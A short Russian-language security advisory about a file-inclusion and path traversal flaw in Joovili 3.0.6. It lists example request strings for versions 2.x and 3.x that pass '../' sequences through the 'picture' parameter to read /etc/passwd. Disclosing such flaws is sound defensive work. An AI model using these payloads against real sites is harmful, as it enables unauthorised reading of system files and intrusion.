Программа: Joovili 3.0.6
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных сценарием images.inc.php или joovili.images.php (для версии 3.x). Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Примеры:
Версия: 2.x
include/images.inc.php?picture=../../../../../../../../ etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../ ..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
Версия 3.x
joovili.images.php?picture=../../../../../../../../// etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..// ../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
Демо